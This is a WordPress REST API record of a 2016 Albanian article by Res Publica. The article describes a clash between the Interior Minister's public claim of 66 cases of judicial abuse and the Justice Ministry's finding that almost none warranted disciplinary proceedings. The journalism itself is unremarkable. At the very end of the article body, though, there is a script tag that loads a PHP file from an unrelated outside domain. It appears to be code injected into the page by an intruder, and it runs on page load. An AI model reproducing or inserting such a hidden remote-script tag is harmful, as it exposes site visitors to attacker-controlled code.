{"id":1048,"date":"2016-03-29T17:00:41","date_gmt":"2016-03-29T15:00:41","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=1048"},"modified":"2016-03-29T17:43:16","modified_gmt":"2016-03-29T15:43:16","slug":"perplasje-ne-qeveri-ministri-i-drejtesise-nuk-eshte-dakord-me-ministrin-e-brendshem-per-procedimin-e-66-gjyqtareve","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=1048","title":{"rendered":"P\u00ebrplasje n\u00eb qeveri: Ministri i Drejt\u00ebsis\u00eb nuk ishte dakord me Ministrin e Brendsh\u00ebm p\u00ebr procedimin e 66 rasteve t\u00eb shkeljeve nga gjyqtar\u00ebt"},"content":{"rendered":"<p><a href=\"http:\/\/www.respublica.org.al\/perplasje-ne-qeveri-ministri-i-drejtesise-nuk-eshte-dakord-me-ministrin-e-brendshem-per-procedimin-e-66-gjyqtareve\/nishani-tahiri-565x348\/\" rel=\"attachment wp-att-1049\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignleft wp-image-1049 size-medium\" src=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2016\/03\/nishani-tahiri-565x348-300x185.jpg\" alt=\"nishani-tahiri-565x348\" width=\"300\" height=\"185\" srcset=\"https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2016\/03\/nishani-tahiri-565x348-300x185.jpg 300w, https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2016\/03\/nishani-tahiri-565x348.jpg 565w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>T\u00eb gjith\u00eb e mbajm\u00eb mend se si Ministri i Brendsh\u00ebm Saimir Tahiri n\u00eb Prill 2014 denoncoi publikisht 66 raste abuzimi nga gjyqtar\u00ebt dhe k\u00ebrkoi nga Presidenti i Republik\u00ebs q\u00eb ata t\u00eb procedoheshin n\u00eb K\u00ebshillin e Lart\u00eb t\u00eb Drejt\u00ebsis\u00eb. Jo vet\u00ebm ministri Tahiri, por edhe Kryeministri Rama i p\u00ebrs\u00ebriti k\u00ebto denoncime kur fliste kund\u00ebr gjyqtar\u00ebve t\u00eb korruptuar.<\/p>\n<p>Sot, pas m\u00eb shum\u00eb se nj\u00eb viti asnj\u00eb nga k\u00ebto denoncime nuk shkoi n\u00eb KLD. Arsyet i b\u00ebn t\u00eb ditura Ministri i Drejt\u00ebsis\u00eb, i cili nuk mendon nj\u00eblloj si Ministri i Brendsh\u00ebm. P\u00ebr Ministrin\u00eb e Drejt\u00ebsis\u00eb asnj\u00eb nga rastet e raportuara nga Sajmir Tahiri nuk p\u00ebrb\u00ebn shkak p\u00ebr t\u00eb k\u00ebrkuar procedimin disiplinor t\u00eb gjyqtar\u00ebve.<\/p>\n<p>Res Publica u interesua q\u00eb n\u00eb momentet e para t\u00eb b\u00ebrjes publike t\u00eb k\u00ebtij denoncimi. Kush e njeh ndopak ligjin p\u00ebr pushtetin gjyq\u00ebsor e di q\u00eb Presidenti v\u00ebrtet \u00ebsht\u00eb kryetar i K\u00ebshillit t\u00eb Lart\u00eb t\u00eb Drejt\u00ebsis\u00eb, por nuk ka asgj\u00eb n\u00eb dor\u00eb p\u00ebr t\u00eb proceduar gjyqtar\u00ebt e korruptuar. K\u00ebt\u00eb t\u00eb drejt\u00eb, pra at\u00eb t\u00eb nisjes s\u00eb nj\u00eb procedimi n\u00eb KLD, e ka vet\u00ebm Ministri i Drejt\u00ebsis\u00eb. Nga informacionet zyrtare Presidenti i Republik\u00ebs i kishte d\u00ebrguar materialet Ministrit t\u00eb Drejt\u00ebsis\u00eb p\u00ebr veprime t\u00eb m\u00ebtejshme (sipas ligjit).<\/p>\n<p>M\u00eb pas, Res Publica pyeti Ministrin e Drejt\u00ebsis\u00eb se cfar\u00eb ishte b\u00ebr\u00eb p\u00ebr k\u00ebto denoncime dhe p\u00ebrgjigja ishte q\u00eb p\u00ebr nj\u00eb rast c\u00ebshtja ishte d\u00ebrguar n\u00eb KLD (p\u00ebr disa arsye t\u00eb tjera nga ato q\u00eb pretendonte Ministri i Brendsh\u00ebm) dhe p\u00ebr 14 raste ishte b\u00ebr\u00eb verifikimi i tyre. P\u00ebr 51 rastet e tjer\u00eb nuk \u00ebsht\u00eb kryer ndonj\u00eb veprim.<\/p>\n<p>N\u00eb Maj 2015, gjat\u00eb prezantimit t\u00eb nj\u00eb raporti p\u00ebr pand\u00ebshkueshm\u00ebrin\u00eb e gjyqtar\u00ebve n\u00eb KLD, t\u00eb p\u00ebrgatitur nga Res Publica, p\u00ebrfaq\u00ebsues t\u00eb Ministris\u00eb s\u00eb Drejt\u00ebsis\u00eb u shpreh\u00ebn se nga verifikimet e kryera p\u00ebr denoncimet e Ministrit t\u00eb Brendsh\u00ebm u gjet\u00ebn vet\u00ebm 5\u00a0raste me shkelje t\u00eb lehta, t\u00eb cilat nuk ishin d\u00ebrguar n\u00eb KLD, por q\u00eb t\u00eb do mbaheshin parasysh n\u00eb t\u00eb ardhmen n\u00eb rast se gjyqtar\u00ebt do t\u00eb b\u00ebnin edhe shkelje t\u00eb tjera. Kjo gj\u00eb ndodh zakonisht kur shkeljet jan\u00eb aq t\u00eb lehta sa ndaj tyre nuk mund t\u00eb marr\u00ebsh asnj\u00eb mas\u00eb, qoft\u00eb edhe \u201cv\u00ebrejtje\u201d.<\/p>\n<p>Sa m\u00eb sip\u00ebr, vuri n\u00eb pah nj\u00eb ngjarje tep\u00ebr\u00a0 t\u00eb pak\u00ebndshme, ku publikut i thuhet me z\u00eb t\u00eb lart\u00eb nga Ministri i Brendsh\u00ebm dhe Kryeministri se jan\u00eb zbuluar 66 raste gjyqtar\u00ebsh q\u00eb shkelin ligjin, nd\u00ebrkoh\u00eb q\u00eb kur verifikohet nga organi kompetent, Ministri i Drejt\u00ebsis\u00eb, rezulton nj\u00eb alarm fals dhe kjo gj\u00eb nuk b\u00ebhet publike.<\/p>\n<p>Kjo mosp\u00ebrputhje mendimesh mes an\u00ebtar\u00ebve t\u00eb t\u00eb nj\u00ebjt\u00ebs qeveri, ku nj\u00ebra pal\u00eb shprehet se n\u00eb gjyq\u00ebsor po b\u00ebhet nami, nd\u00ebrsa pala tjet\u00ebr e trajton k\u00ebt\u00eb si ekzagjerim, duhej b\u00ebr\u00eb publike. Kjo \u00ebsht\u00eb nj\u00eb mosp\u00ebrputhje e dukshme mes asaj q\u00eb Qeveria deklaron publikisht, dhe asaj q\u00eb Qeveria ndjek zyrtarisht. N\u00ebse \u00ebsht\u00eb e v\u00ebrtet\u00eb q\u00eb n\u00eb 66 raste ka shkelje nga ana e gjyqtar\u00ebve, Qeveria duhet t\u00eb vepronte shpejt. N\u00ebse Ministri i Drejt\u00ebsis\u00eb \u00ebsht\u00eb i mendimit q\u00eb k\u00ebto \u00e7\u00ebshtje nuk duhet t\u00eb ndiqeshin sepse mungojn\u00eb element\u00ebt p\u00ebr t\u00eb k\u00ebrkuar procedimin t\u00eb gjyqtar\u00ebve, at\u00ebher\u00eb Qeveria duhej m\u00eb s\u00eb paku t\u00eb qet\u00ebsonte publikun q\u00eb numri i shkeljeve nuk prekte nj\u00eb num\u00ebr aq t\u00eb madh gjyqtar\u00ebsh.<\/p>\n<p>Nuk mund t\u00eb ken\u00eb t\u00eb drejt\u00eb t\u00eb dyja pal\u00ebt. Ose duhet th\u00ebn\u00eb q\u00eb Ministri i Brendsh\u00ebm dhe Kryeministri shprehen kot, sa p\u00ebr sy e faqe, dhe r\u00ebndojn\u00eb pa t\u00eb drejt\u00ebn pozit\u00ebn e gjyqtar\u00ebve pa pasur fakte konkrete, ose Ministri i Drejt\u00ebsis\u00eb \u00ebsht\u00eb i korruptuar dhe mbron gjyqtar\u00ebt e korruptuar t\u00eb kapur <em>me presh n\u00eb duar<\/em> nga Ministri i Brendsh\u00ebm. Rrug\u00eb t\u00eb mesme v\u00ebshtir\u00eb t\u00eb ket\u00eb.<\/p>\n<p>Res Publica<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>T\u00eb gjith\u00eb e mbajm\u00eb mend se si Ministri i Brendsh\u00ebm Saimir Tahiri n\u00eb Prill 2014 denoncoi publikisht 66 raste abuzimi [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1049,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,5],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1048"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1048"}],"version-history":[{"count":9,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1048\/revisions"}],"predecessor-version":[{"id":1058,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1048\/revisions\/1058"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/1049"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1048"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1048"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1048"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}